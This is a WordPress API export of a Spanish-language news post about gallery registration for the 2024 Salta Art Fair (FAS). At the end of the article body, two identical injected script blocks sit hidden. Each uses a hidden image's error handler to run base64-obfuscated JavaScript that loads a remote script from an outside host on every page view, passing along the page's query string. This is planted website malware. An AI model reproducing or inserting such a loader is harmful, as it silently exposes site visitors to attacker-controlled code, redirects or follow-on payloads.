{"id":4096,"date":"2024-06-10T12:12:14","date_gmt":"2024-06-10T15:12:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4096"},"modified":"2025-08-13T23:54:37","modified_gmt":"2025-08-14T02:54:37","slug":"fas-2024-ultimo-dia-de-inscripcion-para-galerias-de-arte","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4096","title":{"rendered":"FAS 2024: \u00daltimo d\u00eda de inscripci\u00f3n para galer\u00edas de arte"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-58ef0d40fd81b96376bd96be3e84d2e7\" style=\"background-color:#b30660\"><em>Est\u00e1 abierta la convocatoria de la Feria de Arte Salta (FAS) para galer\u00edas de arte del NOA, y\/o que representen a artistas del noroeste argentino.<\/em><\/h3>\n\n\n\n<p>FAS 2024 ser\u00e1 la primera Feria de Arte de car\u00e1cter regional con sede en Salta, y se realizar\u00e1 del 1 al 4 de agosto pr\u00f3ximo.&nbsp;Hay tiempo de inscribirse hasta hoy lunes 10 de junio.<\/p>\n\n\n\n<p>Se trata de una &nbsp;iniciativa de la Subsecretar\u00eda de Patrimonio Cultural de la Secretar\u00eda de Cultura, y el grupo ACCIONARTE de Virginia Blaquier, Esteban Drincovich y Alfredo Mu\u00f1oz. Tendr\u00e1 lugar en Punto Corp, un nuevo edificio en San Lorenzo Chico desarrollado por Proyecto Norte, que se suma para concretar proyectos que impacten en la escena art\u00edstica local.<\/p>\n\n\n\n<p>FAS 2024 est\u00e1 dirigida a galer\u00edas de arte de la Regi\u00f3n NOA y de cualquier parte del pa\u00eds que representen a artistas de las provincias que integran la Regi\u00f3n. La convocatoria a inscripci\u00f3n ya est\u00e1 abierta, hasta el pr\u00f3ximo lunes 10 de junio.<\/p>\n\n\n\n<p>Para inscribirse, las galer\u00edas deben consultar bases y condiciones aqu\u00ed:&nbsp;<a href=\"https:\/\/cutt.ly\/JeiE3AKQ\">https:\/\/cutt.ly\/JeiE3AKQ<\/a>&nbsp;y luego completar un formulario en el siguiente enlace:&nbsp;&nbsp;<a href=\"https:\/\/cutt.ly\/4eui7Vbg\">https:\/\/cutt.ly\/4eui7Vbg<\/a><\/p>\n\n\n\n<p>Los objetivos de esta Feria que son, principalmente: promover el arte y la cultura, apoyar a artistas locales y de la Regi\u00f3n, impulsar el turismo cultural, fomentar un mercado del arte, acercar al p\u00fablico a las expresiones culturales contempor\u00e1neas y posicionar a Salta como referente del arte contempor\u00e1neo.<\/p>\n\n\n\n<p><strong>Importantes premios<\/strong><\/p>\n\n\n\n<p>En el lanzamiento, se inform\u00f3 adem\u00e1s que a lo largo de la Feria se entregar\u00e1n tres importantes premios para artistas y galer\u00edas: el premio In Situ, que fue creado por los coleccionistas Abel Guaglionone y Joaquin Rodr\u00edguez y que se entrega en cada edici\u00f3n de ArteBA; el premio Fausto para artistas emergentes de la Galer\u00eda tucumana Fausto, y el premio ACCIONARTE que van a entregar los coleccionistas salte\u00f1os.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/fas-2024-ltimo-dia-de-inscripcion-para-galerias-de-arte-96066\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Est\u00e1 abierta la convocatoria de la Feria de Arte Salta (FAS) para galer\u00edas de arte del NOA, y\/o que representen a artistas del noroeste argentino. FAS 2024 ser\u00e1 la primera Feria de Arte de car\u00e1cter regional con sede en Salta, y se realizar\u00e1 del 1 al 4 de agosto pr\u00f3ximo.&nbsp;Hay tiempo de inscribirse hasta hoy [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4097,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4096","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4096"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4096"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4096\/revisions"}],"predecessor-version":[{"id":6767,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4096\/revisions\/6767"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4097"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4096"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4096"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4096"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}